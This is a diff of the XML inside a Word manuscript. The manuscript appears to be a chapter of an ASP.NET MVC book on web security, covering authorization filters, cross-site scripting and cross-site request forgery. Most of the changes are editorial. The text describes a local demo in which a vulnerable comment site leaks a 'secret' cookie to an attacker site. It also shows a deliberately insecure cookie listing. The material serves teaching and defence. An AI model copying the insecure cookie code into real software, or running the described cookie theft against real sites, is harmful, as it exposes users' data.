-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>OnAuthorization</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> method (1)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, and sets the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizationContext</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">'s </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>Result</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> property to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>HttpUnauthorizedResult</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> - the mechanism for returning that </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>401</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> status code</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">There are several other </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>IAuthenticationFilter</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> implementations in ASP.NET MVC; all are used to short-circuit the normal response to protect against undesired requests.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  Chapter 9 covered filters, and these five filters deal specifically with security.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-      </w:pPr>
-      <w:commentRangeStart w:id="6"/>
-      <w:commentRangeStart w:id="7"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>ChildActionOnlyAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>RequireHttpsAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>ValidateAntiForgeryTokenAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>ValidateInputAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:commentRangeEnd w:id="6"/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
+        <w:commentReference w:id="19"/>
+      </w:r>
+      <w:commentRangeStart w:id="23"/>
+      <w:commentRangeStart w:id="24"/>
+      <w:commentRangeEnd w:id="20"/>
+      <w:r>
+        <w:commentReference w:id="20"/>
+      </w:r>
+      <w:r>
+        <w:t>that</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="23"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="6"/>
-      </w:r>
-      <w:commentRangeEnd w:id="7"/>
-      <w:r>
-        <w:commentReference w:id="7"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">We've seen how </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> can help us manage authentication and authorization, now let's turn our attention to other</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, more insidious</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> att</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ack vectors. While authentication and authorization checks prevent hapless visitors from accessing secure </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>areas, we still must protect our application from hackers and thieves who attempt to exploit vulnerabilities inherent in web applications.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head1"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">11.2 </w:t>
-      </w:r>
-      <w:commentRangeStart w:id="8"/>
-      <w:commentRangeStart w:id="9"/>
-      <w:r>
-        <w:t>C</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ross-</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Site </w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="8"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:b w:val="0"/>
-          <w:i w:val="0"/>
-          <w:vanish/>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:commentReference w:id="8"/>
-      </w:r>
-      <w:commentRangeEnd w:id="9"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:b w:val="0"/>
-          <w:i w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:commentReference w:id="9"/>
-      </w:r>
-      <w:r>
-        <w:t>Scripting (XSS)</w:t>
+        <w:commentReference w:id="23"/>
+      </w:r>
+      <w:commentRangeEnd w:id="24"/>
+      <w:r>
+        <w:commentReference w:id="24"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> v</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">isiting browsers </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">subsequently </w:t>
+      </w:r>
+      <w:r>
+        <w:t>execute</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Traditionally</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> that malicious script sends a request to a third-party site containing sensitive data.  That's the cross-site part.  A user puts a script on one site that sends</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> secret data </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">to another, conspiring site. The trick </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">for the hacker </w:t>
+      </w:r>
+      <w:r>
+        <w:t>is to actually get the script to run on the vulnerable site.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>11.2.1 XSS In Action</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1042,83 +1223,86 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t>Cross-</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">site scripting </w:t>
-      </w:r>
-      <w:r>
-        <w:t>is a technique where a malicious user manipulates the system so that special JavaScript appears on the vuln</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">erable </w:t>
-      </w:r>
-      <w:commentRangeStart w:id="10"/>
-      <w:commentRangeStart w:id="11"/>
-      <w:r>
-        <w:t>w</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ebsite -- </w:t>
-      </w:r>
-      <w:r>
-        <w:t>script</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="10"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:vanish/>
-        </w:rPr>
-        <w:commentReference w:id="10"/>
-      </w:r>
-      <w:commentRangeEnd w:id="11"/>
-      <w:r>
-        <w:commentReference w:id="11"/>
-      </w:r>
-      <w:r>
-        <w:t>that</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> v</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">isiting browsers </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">subsequently </w:t>
-      </w:r>
-      <w:r>
-        <w:t>execute</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. Traditionally</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> that malicious script sends a request to a third-party site containing sensitive data.  That's the cross-site part.  A user puts a script on one site that sends</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> secret data </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">to another, conspiring site. The trick </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">for the hacker </w:t>
-      </w:r>
-      <w:r>
-        <w:t>is to actually get the script to run on the vulnerable site.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>11.2.1 XSS In Action</w:t>
+        <w:t xml:space="preserve">In the source code for this book we've included a sample </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Visual Studio solution </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">that you can run to </w:t>
+      </w:r>
+      <w:r>
+        <w:t>perform</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>simulated, local</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> XSS attack.  It contains two simple </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ASP.NET </w:t>
+      </w:r>
+      <w:r>
+        <w:t>MVC</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> applications.  </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="25"/>
+      <w:r>
+        <w:t>One is vulne</w:t>
+      </w:r>
+      <w:r>
+        <w:t>rable to cross site scripting</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="25"/>
+      <w:r>
+        <w:commentReference w:id="25"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">It features a simple comment submission page. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>We'll submit JavaScript as part of the comment</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, and our vulnerable web site will render the JavaScript as if it were legitimate</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> The other </w:t>
+      </w:r>
+      <w:r>
+        <w:t>website</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is the at</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">tacker. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>It simply collects submissions so we can see if our attack worked.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Preparing the example</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1126,75 +1310,110 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">In the source code for this book we've included a sample </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Visual Studio solution </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">that you can run to </w:t>
-      </w:r>
-      <w:r>
-        <w:t>perform</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:r>
-        <w:t>simulated, local</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> XSS attack.  It contains two simple </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ASP.NET </w:t>
-      </w:r>
-      <w:r>
-        <w:t>MVC</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> applications.  One is vulne</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">rable to cross site scripting. </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">It features a simple comment submission page. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>We'll submit JavaScript as part of the comment</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, and our vulnerable web site will render the JavaScript as if it were legitimate</w:t>
+        <w:t>When the example Visual Studio solution is run (typically with CTRL-F5), two sites appear in the web browser.  The vulnerable site sets a cookie, ostensibly containing sensitive data. The second site is the attacker</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, it will collect the data from our evil request</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.  The attacking site has a page that should read "</w:t>
+      </w:r>
+      <w:r>
+        <w:t>No victims yet</w:t>
+      </w:r>
+      <w:r>
+        <w:t>".  After we initiate our attack, it will display the "secret" cookie.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t>On the vulnerable site, the cookie has been set with the code i</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">n </w:t>
+      </w:r>
+      <w:r>
+        <w:t>l</w:t>
+      </w:r>
+      <w:r>
+        <w:t>isting 11</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> The other </w:t>
-      </w:r>
-      <w:r>
-        <w:t>website</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is the at</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">tacker. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>It simply collects submissions so we can see if our attack worked.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Preparing the example</w:t>
+        <w:t>5, traditional cookie-setting code</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeListingCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Listing 11.5 Setting an insecure cookie with "secret" data</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public ActionResult Index()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>var cookie = new HttpCookie("mvcinaction", "secret");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>Response.SetCookie(cookie);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>return View();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1202,150 +1421,20 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t>When the example Visual Studio solution is run (</w:t>
-      </w:r>
-      <w:commentRangeStart w:id="12"/>
-      <w:commentRangeStart w:id="13"/>
-      <w:r>
-        <w:t xml:space="preserve">typically with CTRL-F5), </w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="12"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:vanish/>
-        </w:rPr>
-        <w:commentReference w:id="12"/>
-      </w:r>
-      <w:commentRangeEnd w:id="13"/>
-      <w:r>
-        <w:commentReference w:id="13"/>
-      </w:r>
-      <w:r>
-        <w:t>two sites appear in the web browser.  The vulnerable site sets a cookie, ostensibly containing sensitive data. The second site is the attacker</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, it will collect the data from our evil request</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.  The attacking site has a page that should read "</w:t>
-      </w:r>
-      <w:r>
-        <w:t>No victims yet</w:t>
-      </w:r>
-      <w:r>
-        <w:t>".  After we initiate our attack, it will display the "secret" cookie.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:r>
-        <w:t>On the vulnerable site, the cookie has been set with the code i</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">n </w:t>
-      </w:r>
-      <w:r>
-        <w:t>l</w:t>
-      </w:r>
-      <w:r>
-        <w:t>isting 11</w:t>
+        <w:t>The cookie set, we can play the part of the hacker on the Comments page</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, shown in figure 11.1</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:r>
-        <w:t>5, traditional cookie-setting code</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeListingCaption"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Listing 11.5 Setting an insecure cookie with "secret" data</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>public ActionResult Index()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>var cookie = new HttpCookie("mvcinaction", "secret");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>Response.SetCookie(cookie);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>return View();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The cookie set, we can play the part of the hacker on the Comments page</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, shown in figure 11.1</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
@@ -1469,6 +1558,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
@@ -1653,6 +1743,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
@@ -1720,26 +1811,24 @@
       <w:pPr>
         <w:pStyle w:val="Body1"/>
       </w:pPr>
-      <w:commentRangeStart w:id="14"/>
-      <w:r>
-        <w:t xml:space="preserve">Never trust input.  Never, ever, ever expect input to be safe.  </w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="14"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:vanish/>
-        </w:rPr>
-        <w:commentReference w:id="14"/>
-      </w:r>
-      <w:r>
-        <w:t>Whether it</w:t>
-      </w:r>
+      <w:r>
+        <w:t>Never trust input.  Never, ever, ever expect input to be safe.  Whether it</w:t>
+      </w:r>
+      <w:ins w:id="26" w:author="JSkinner" w:date="2010-03-02T19:00:00Z">
+        <w:r>
+          <w:t>'</w:t>
+        </w:r>
+      </w:ins>
       <w:r>
         <w:t>s</w:t>
       </w:r>
-      <w:r>
-        <w:t>s from a human user or a machine, dangerous input is the root attack vector involved in XSS attacks.  We don't trust it coming in, and we certainly don't trust it when we render it.  That's the key.</w:t>
+      <w:del w:id="27" w:author="JSkinner" w:date="2010-03-02T19:00:00Z">
+        <w:r>
+          <w:delText>s</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t xml:space="preserve"> from a human user or a machine, dangerous input is the root attack vector involved in XSS attacks.  We don't trust it coming in, and we certainly don't trust it when we render it.  That's the key.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1825,11 +1914,60 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:commentRangeStart w:id="28"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
-        <w:t>&lt;%= HttpUtility.HtmlEncode(Model.Comment) %&gt;</w:t>
+        <w:t xml:space="preserve">&lt;%= </w:t>
+      </w:r>
+      <w:del w:id="29" w:author="JSkinner" w:date="2010-03-02T19:01:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="CodeinText"/>
+          </w:rPr>
+          <w:delText>HttpUtility</w:delText>
+        </w:r>
+      </w:del>
+      <w:ins w:id="30" w:author="JSkinner" w:date="2010-03-02T19:01:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="CodeinText"/>
+          </w:rPr>
+          <w:t>Html</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:del w:id="31" w:author="JSkinner" w:date="2010-03-02T19:01:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="CodeinText"/>
+          </w:rPr>
+          <w:delText>HtmlEncode</w:delText>
+        </w:r>
+      </w:del>
+      <w:ins w:id="32" w:author="JSkinner" w:date="2010-03-02T19:01:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="CodeinText"/>
+          </w:rPr>
+          <w:t>Encode</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>(Model.Comment) %&gt;</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="28"/>
+      <w:r>
+        <w:commentReference w:id="28"/>
       </w:r>
     </w:p>
     <w:p>
@@ -1844,6 +1982,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
@@ -1914,7 +2053,20 @@
         <w:pStyle w:val="Sidebar"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">There's a new feature in ASP.NET 4 that allows developers to conveniently express HTML encoded output without using the HttpUtility.Encode helper function.  Instead of specifying output with </w:t>
+        <w:t xml:space="preserve">There's a new feature in ASP.NET 4 that allows developers to conveniently express HTML encoded output without using the </w:t>
+      </w:r>
+      <w:del w:id="33" w:author="JSkinner" w:date="2010-03-02T19:02:00Z">
+        <w:r>
+          <w:delText>HttpUtility</w:delText>
+        </w:r>
+      </w:del>
+      <w:ins w:id="34" w:author="JSkinner" w:date="2010-03-02T19:02:00Z">
+        <w:r>
+          <w:t>Html</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t xml:space="preserve">.Encode helper function.  Instead of specifying output with </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1934,8 +2086,8 @@
       <w:r>
         <w:t xml:space="preserve">.  For more information, refer to Phil Haack's blog post: </w:t>
       </w:r>
-      <w:commentRangeStart w:id="15"/>
-      <w:commentRangeStart w:id="16"/>
+      <w:commentRangeStart w:id="35"/>
+      <w:commentRangeStart w:id="36"/>
       <w:r>
         <w:fldChar w:fldCharType="begin"/>
       </w:r>
@@ -1951,20 +2103,20 @@
       <w:r>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
-      <w:commentRangeEnd w:id="15"/>
+      <w:commentRangeEnd w:id="35"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="15"/>
-      </w:r>
-      <w:commentRangeEnd w:id="16"/>
+        <w:commentReference w:id="35"/>
+      </w:r>
+      <w:commentRangeEnd w:id="36"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:commentReference w:id="16"/>
+        <w:commentReference w:id="36"/>
       </w:r>
     </w:p>
     <w:p>
@@ -2102,6 +2254,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -2223,7 +2376,20 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t>In the example code for this chapter we've included a working XSRF demonstration. Again, there are two sites in the solution: a vulnerable one and the attacker.  The vulnerable site accepts a simple form post.  If you imagine the secure commands we issue in the course of a regular day - transferring funds between bank accounts, buying or selling securities, authorizing raises, it could be profitable for a hacker to formulate a special request on your behalf and have you unknowningly transmit it to a site you are known to visit.</w:t>
+        <w:t xml:space="preserve">In the example code for this chapter we've included a working XSRF demonstration. Again, there are two sites in the solution: a vulnerable one and the attacker.  The vulnerable site accepts a simple form post.  If you imagine the secure commands we issue in the course of a regular day - transferring funds between bank accounts, buying or selling securities, authorizing raises, it could be profitable for a hacker to formulate a special request on your behalf and have you </w:t>
+      </w:r>
+      <w:del w:id="37" w:author="JSkinner" w:date="2010-03-02T19:06:00Z">
+        <w:r>
+          <w:delText xml:space="preserve">unknowningly </w:delText>
+        </w:r>
+      </w:del>
+      <w:ins w:id="38" w:author="JSkinner" w:date="2010-03-02T19:06:00Z">
+        <w:r>
+          <w:t xml:space="preserve">unknowingly </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>transmit it to a site you are known to visit.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2238,6 +2404,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
@@ -2300,22 +2467,7 @@
         <w:pStyle w:val="Body"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Behind the scenes in the </w:t>
-      </w:r>
-      <w:commentRangeStart w:id="17"/>
-      <w:r>
-        <w:t xml:space="preserve">bowels of the HTML source </w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="17"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:vanish/>
-        </w:rPr>
-        <w:commentReference w:id="17"/>
-      </w:r>
-      <w:r>
-        <w:t>another story is told, shown in listing 11.9.</w:t>
+        <w:t>Behind the scenes in the bowels of the HTML source another story is told, shown in listing 11.9.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2454,6 +2606,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -2515,28 +2668,53 @@
         <w:pStyle w:val="Body"/>
       </w:pPr>
       <w:r>
